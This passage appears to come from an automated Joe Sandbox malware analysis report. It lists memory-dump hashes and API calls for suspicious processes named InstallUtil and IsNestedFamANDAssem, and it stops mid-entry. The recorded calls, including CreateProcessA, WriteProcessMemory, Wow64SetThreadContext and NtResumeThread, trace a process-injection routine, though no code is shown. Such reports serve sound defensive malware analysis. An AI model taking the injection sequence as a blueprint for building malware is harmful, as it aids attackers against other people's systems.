                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71818661427.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_1140000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 226dfddb88e580357331a6bd99bc52a0cada6d859946037d85a2c2a4e26d0095
                                                                  • Instruction ID: fb61539030f285eab58ad038e465ba03120c9b8c9966378b7a7bdacdaf3a9321
                                                                  • Opcode Fuzzy Hash: 226dfddb88e580357331a6bd99bc52a0cada6d859946037d85a2c2a4e26d0095
                                                                  • Instruction Fuzzy Hash: A190023104460C8B459027D5784A656B79C95845157819055AA4D819065E6A641086D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                                  Execution Graph

                                                                  Execution Coverage:11.8%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:219
                                                                  Total number of Limit Nodes:6

                                                                  Control-flow Graph (first block 5dbc9b8-5dbc9d9; graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8
                                                                  • API String ID: 0-4194326291
                                                                  • Opcode ID: 4a750822c09046c975b5d693bb2402edc8f084e0efec94036a591dfd9525f86c
                                                                  • Instruction ID: 1a56e851cd6ef5543f11f9b81e0fb1d5692f8a0864eabf7692412f3f30baae07
                                                                  • Opcode Fuzzy Hash: 4a750822c09046c975b5d693bb2402edc8f084e0efec94036a591dfd9525f86c
                                                                  • Instruction Fuzzy Hash: 6A52C675E00229CFDB64DF69C850AD9B7B6FB89300F50869AD44DA7354DB70AE81CF90

                                                                  Control-flow Graph (first block 6bafeb8-6bafebe; graph not reproduced)
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06BAFF49
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725421654.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6ba0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: 5816f75899d49ea645bf2b9de22934bbc1a6617a7c9a8f122cd5f176f6324b77
                                                                  • Instruction ID: 6d26afb35c80a816a5ffc4feb347397730cc7e062a73344e501ee9de28826faf
                                                                  • Opcode Fuzzy Hash: 5816f75899d49ea645bf2b9de22934bbc1a6617a7c9a8f122cd5f176f6324b77
                                                                  • Instruction Fuzzy Hash: 1321E2B1D013499FDB10DFAAD884AEEFBF9BF48310F60842AE519A7240D7759945CBA0

                                                                  Control-flow Graph (first block 6bafec0-6baff56; graph not reproduced)
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06BAFF49
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725421654.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6ba0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: 3f321f481748ce930537a165ee9145e96e146cf225b152038ee78d6ebb93b8cb
                                                                  • Instruction ID: bdcdcc9d7bb4fccc690c2252f4e7a49622983ad3f4ac0905813171927060f974
                                                                  • Opcode Fuzzy Hash: 3f321f481748ce930537a165ee9145e96e146cf225b152038ee78d6ebb93b8cb
                                                                  • Instruction Fuzzy Hash: AC21F2B1D013499FDB10DFAAD884AEEFBF5FF48310F60842AE519A7240C7759945CBA0
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 06D63246
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: f2bae044b9f1598274ba1f9cc67a8a9ede992f333403f0795a392fc3d51100d9
                                                                  • Instruction ID: de0fb402f7a92229f7ca4257892d099130558f922f6f91ea4a13245228ac59a4
                                                                  • Opcode Fuzzy Hash: f2bae044b9f1598274ba1f9cc67a8a9ede992f333403f0795a392fc3d51100d9
                                                                  • Instruction Fuzzy Hash: 9A2136B1D00309CFDB10DFAAD48479EFBF8BF89224F60842AD519A7200D7799945CFA0
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 06D63246
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 83d2ff96dd66596c6843fe5bd3db1e986554c0a121f565302d891d454593a283
                                                                  • Instruction ID: 0ee4deb78791077d78060a30cd2a4f0342209732e20cb2c344493e68438934dc
                                                                  • Opcode Fuzzy Hash: 83d2ff96dd66596c6843fe5bd3db1e986554c0a121f565302d891d454593a283
                                                                  • Instruction Fuzzy Hash: CB1117B1D003098FDB10DFAAC48479EFBF4AF88224F54842AD519A7240C7789945CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h
                                                                  • API String ID: 0-2439710439
                                                                  • Opcode ID: 1c5fe5620c7a505f95d09bf374bf34e8c07f4e9a2105dbbc21c98558c486ce16
                                                                  • Instruction ID: dbf10355c4612a4396d022e6f15ec062a3e033eef4b6e18a49b8818bb6ee3b39
                                                                  • Opcode Fuzzy Hash: 1c5fe5620c7a505f95d09bf374bf34e8c07f4e9a2105dbbc21c98558c486ce16
                                                                  • Instruction Fuzzy Hash: E281F571E00629CBEB64DF69C850AD9B7B2FF89300F5082AAD55DB7254DB306E85CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J
                                                                  • API String ID: 0-1141589763
                                                                  • Opcode ID: fbbb3100db19a224cd80be2ddd42be099d677e1b4c32a7dce057fa8c991206f6
                                                                  • Instruction ID: 93f14298c5d0ba292e0a9168c333db9a8347b737755f91d787f88a21d80c37a6
                                                                  • Opcode Fuzzy Hash: fbbb3100db19a224cd80be2ddd42be099d677e1b4c32a7dce057fa8c991206f6
                                                                  • Instruction Fuzzy Hash: F9319BB1E516288BEB69DF6BDC4069DBAFBBFC8204F04D1AAD50CA6255D7700B818F40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PZT
                                                                  • API String ID: 0-3004033766
                                                                  • Opcode ID: 586ec178dca37b247425657d7ab490bd3d89969cc7f3535238b58ec6f1db0908
                                                                  • Instruction ID: 8c1b7cf2f7f2ab88810e702392f7c30b3026759fea5de971d58b1f70279197d5
                                                                  • Opcode Fuzzy Hash: 586ec178dca37b247425657d7ab490bd3d89969cc7f3535238b58ec6f1db0908
                                                                  • Instruction Fuzzy Hash: 013130B4A01214DFEBA4CF29D995BADB7F6FB48300F5081AAD40AA7354DB359E80CF40
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f493aaf239085151670b92aaa12b67201498c27960d3d13951c6418ae24a329
                                                                  • Instruction ID: 07fb1aa29c4df3834085177514083bd871b417db1ec479ccd783c800304bc045
                                                                  • Opcode Fuzzy Hash: 9f493aaf239085151670b92aaa12b67201498c27960d3d13951c6418ae24a329
                                                                  • Instruction Fuzzy Hash: 30B10570E05218CFEB94DF6AD584BADBBF2FB89304F6080A9D409A7251DB745D85CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16d9155e111fb61f4a3f5689f2dc30ff0e66fe59ea4631e0d239de8323a1c74d
                                                                  • Instruction ID: 60b6407b9814b7b642f43dc47cb1b491060b153895eba0b10a6bf6082c5dc4c6
                                                                  • Opcode Fuzzy Hash: 16d9155e111fb61f4a3f5689f2dc30ff0e66fe59ea4631e0d239de8323a1c74d
                                                                  • Instruction Fuzzy Hash: DBB10570E05218CFEBA4DFAAD584B9DBBF2FB88304F2080A9D409A7251DB745A85CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57e827e9afa812d64de0cbfc725bca5c3fd37e0d3c24bdb611fa82a839b6e09b
                                                                  • Instruction ID: 3d139aabc7914575da76d700d742241872c492a1e70b1cc92422446acd8d8e7f
                                                                  • Opcode Fuzzy Hash: 57e827e9afa812d64de0cbfc725bca5c3fd37e0d3c24bdb611fa82a839b6e09b
                                                                  • Instruction Fuzzy Hash: 4751BF74D4522CCBEB24CF29C984BD9BBF5BB49304F1086EAD40AA3655DB346AC5CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b0de22fe2902bf4dbaaaba7a4a07c8f6045a1d9ff2594c8d8dd9831b6dcb063
                                                                  • Instruction ID: 5e80c100349db59c90683f233bd8ffb6698bceafcde3690daa01cb5697622da5
                                                                  • Opcode Fuzzy Hash: 4b0de22fe2902bf4dbaaaba7a4a07c8f6045a1d9ff2594c8d8dd9831b6dcb063
                                                                  • Instruction Fuzzy Hash: 3C51B074D4122CCBEB64CF29C980BD9B7F5BB49304F1086EAD40AA3655DB346AC5CF50

                                                                  Control-flow Graph (first block 5db9b6c-5db9b70; graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$>$D
                                                                  • API String ID: 0-588199494
                                                                  • Opcode ID: 8a751b2cb9bb488d88df7af4d255b89983017a4acea1408ce800401082bf93a0
                                                                  • Instruction ID: c4a2e4065a3a9a90e8c9e56f69e32637c82dad2db3f6a6ab5d00efb876abdf47
                                                                  • Opcode Fuzzy Hash: 8a751b2cb9bb488d88df7af4d255b89983017a4acea1408ce800401082bf93a0
                                                                  • Instruction Fuzzy Hash: 1E419FB4905258CBEBA0DF58C898BE9BBB2AB49305F50809AD50EA7340CB755EC9CF54

                                                                  Control-flow Graph (first block 5db922b-5db922f; graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$>
                                                                  • API String ID: 0-3803789803
                                                                  • Opcode ID: 52e21fde8f2cb011e5ed501a1bd7855db7a48cd6974ba045c93a03e7b466246f
                                                                  • Instruction ID: 44be1ec7e4660c128e3f62ff1a1af652522ca20910ca03b8fd87068d44338fee
                                                                  • Opcode Fuzzy Hash: 52e21fde8f2cb011e5ed501a1bd7855db7a48cd6974ba045c93a03e7b466246f
                                                                  • Instruction Fuzzy Hash: 62419F74901268CBEBA4DF58C898BE9BBB2BB49304F5080DAD50EAB354CB755EC5CF04

                                                                  Control-flow Graph (first block 5db949e-5dba126; graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$>
                                                                  • API String ID: 0-3803789803
                                                                  • Opcode ID: f3c9ac4fc02463d5d6927d66abf6574d40ffb3291f009c5a70cda1ba0b91d535
                                                                  • Instruction ID: b2f331feab9f7c2793cb3a4d63fd8aa8eabb6fe0ddc8feacb039a9e48de84445
                                                                  • Opcode Fuzzy Hash: f3c9ac4fc02463d5d6927d66abf6574d40ffb3291f009c5a70cda1ba0b91d535
                                                                  • Instruction Fuzzy Hash: B841A0B4905258CFEBA0DF58C898BE9BBB2BB49304F5080DAD50EA7340CB755EC58F10

                                                                  Control-flow Graph (first block 5db9246-5db9249; graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +$2
                                                                  • API String ID: 0-4066820149
                                                                  • Opcode ID: 5c5a4c67f60944890dd842301ecf931b060dfe6239fe984f4c47771ac3ca36d9
                                                                  • Instruction ID: d199b32f425d3ddd5722c89900a3c816f0c7969542f33acbe998e42e33eb75c9
                                                                  • Opcode Fuzzy Hash: 5c5a4c67f60944890dd842301ecf931b060dfe6239fe984f4c47771ac3ca36d9
                                                                  • Instruction Fuzzy Hash: 6931C5B0905258CFEB60CF54C854BE9BBB2AB49344F5080DAD14EB7240CB759AC5CF14

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: )$A
                                                                  • API String ID: 0-955135197
                                                                  • Opcode ID: f82e98ba2979a590ff788dbe87ba0885a3d212a268a0a4b9196396d26c24f619
                                                                  • Instruction ID: 93f8e2a950810c1133a44a86caea136c3f71efe90e2b6659ea7fce682af1c2b8
                                                                  • Opcode Fuzzy Hash: f82e98ba2979a590ff788dbe87ba0885a3d212a268a0a4b9196396d26c24f619
                                                                  • Instruction Fuzzy Hash: AF21AC74A05228CFDBA1DF64C988BD9BBB6FB49308F1081D9D44EA7245DB359E85CF40

                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D60B62
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: af7b5f169c3050b7586c2ae97d022ed553a37d897d6d2a98bc9d20fc3ab0b773
                                                                  • Instruction ID: 4fe9f0106b5cda239a4d6239cd1745ce070c9d8337581031429c063f74cded78
                                                                  • Opcode Fuzzy Hash: af7b5f169c3050b7586c2ae97d022ed553a37d897d6d2a98bc9d20fc3ab0b773
                                                                  • Instruction Fuzzy Hash: 27812571D006599FDB50CFAAC981BEEBBF2BF48354F14852AE859E7280D7749881CF81

                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D60B62
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 185ec9694d0e670921c0081256a5800085d172b3ee73bbb9927894698b342adc
                                                                  • Instruction ID: 4c4cd11c9b22a8562f351e8218c146cfc3ba13df8eb6388af8eca4e638d58cf2
                                                                  • Opcode Fuzzy Hash: 185ec9694d0e670921c0081256a5800085d172b3ee73bbb9927894698b342adc
                                                                  • Instruction Fuzzy Hash: AE812471D006599FDB50CFAAC981BEEBBF2BF48354F148529E859E7280DB749881CF81

                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D61F08
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: f97fb9602507546890342509c57979adaac897bb323da9b48e1cd314ef9d0fc1
                                                                  • Instruction ID: 65516c5d9c7b003c951f06cff592ed43e654ace3c06db5c0be30f2c8d90c374c
                                                                  • Opcode Fuzzy Hash: f97fb9602507546890342509c57979adaac897bb323da9b48e1cd314ef9d0fc1
                                                                  • Instruction Fuzzy Hash: 50211576900349DFDB10DFAAC884BDEBBF5FF88310F14842AE919A7241D7789955CBA0

                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D61F08
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 327a614ac9ed7e3a468033940d53aad80589999e9a2479717e154c29c2fcca88
                                                                  • Instruction ID: e35f09b033d8b52217ee3a4fada7f5d8d1558924215a27da2262fe0b01c79a07
                                                                  • Opcode Fuzzy Hash: 327a614ac9ed7e3a468033940d53aad80589999e9a2479717e154c29c2fcca88
                                                                  • Instruction Fuzzy Hash: AE212672900349DFDB00CFAAC884BDEBBF5FF48310F10842AE919A7240D7789954CBA0

                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D62606
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: e8a8f8e608182c8882e765a54496f13a33ecd5fea9edc2cfb5757197bd561e68
                                                                  • Instruction ID: 4227d9415b001233d17c2c36aaffa30db42ec698341cfd9d2c03746f0e9f1632
                                                                  • Opcode Fuzzy Hash: e8a8f8e608182c8882e765a54496f13a33ecd5fea9edc2cfb5757197bd561e68
                                                                  • Instruction Fuzzy Hash: 09213A71D003098FDB50DFAAC4857EEBBF4EF88364F54842AD519A7240D7789A45CFA1

                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D62606
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: b95ac859798f3c110248826e88d6f478fad78c574877ba24aa737cc8c3714aa6
                                                                  • Instruction ID: 039557c5641a145e6a5f7bf74c8b45797b882da509faef70ac20f15b40624d52
                                                                  • Opcode Fuzzy Hash: b95ac859798f3c110248826e88d6f478fad78c574877ba24aa737cc8c3714aa6
                                                                  • Instruction Fuzzy Hash: 57214971D003098FDB10DFAAC8847EEBBF4EF88364F54842AD519A7240C7789945CFA1
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D7D7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726094094.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d70000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 8f5d98dd2a57905fd97feb9f8a3653ef68534b38e9ac38e7c58ffd11f00642a7
                                                                  • Instruction ID: 0f27f59c6da259e630b555e5a2fd1d6778ba11398fce7feb3932738629cc8550
                                                                  • Opcode Fuzzy Hash: 8f5d98dd2a57905fd97feb9f8a3653ef68534b38e9ac38e7c58ffd11f00642a7
                                                                  • Instruction Fuzzy Hash: B42137B1C003499FEB10DFAAC884BEEFBF5AF48320F54842AD459A7240D7789545CFA1
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06B4037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 386dcc42ad709cf08a8804f088a9f0185fbcd78bf9c7b7a9e4fe57466e6ad437
                                                                  • Instruction ID: 56eae0102090abd78b338f4de512032adba90e82d2294a9f5cec8bb25ebfcd3f
                                                                  • Opcode Fuzzy Hash: 386dcc42ad709cf08a8804f088a9f0185fbcd78bf9c7b7a9e4fe57466e6ad437
                                                                  • Instruction Fuzzy Hash: 152102B1D007499FDB10DFAAC884BEEFBF4EF88320F54842AD559A7200C7799945CBA0
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D7D7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726094094.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d70000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
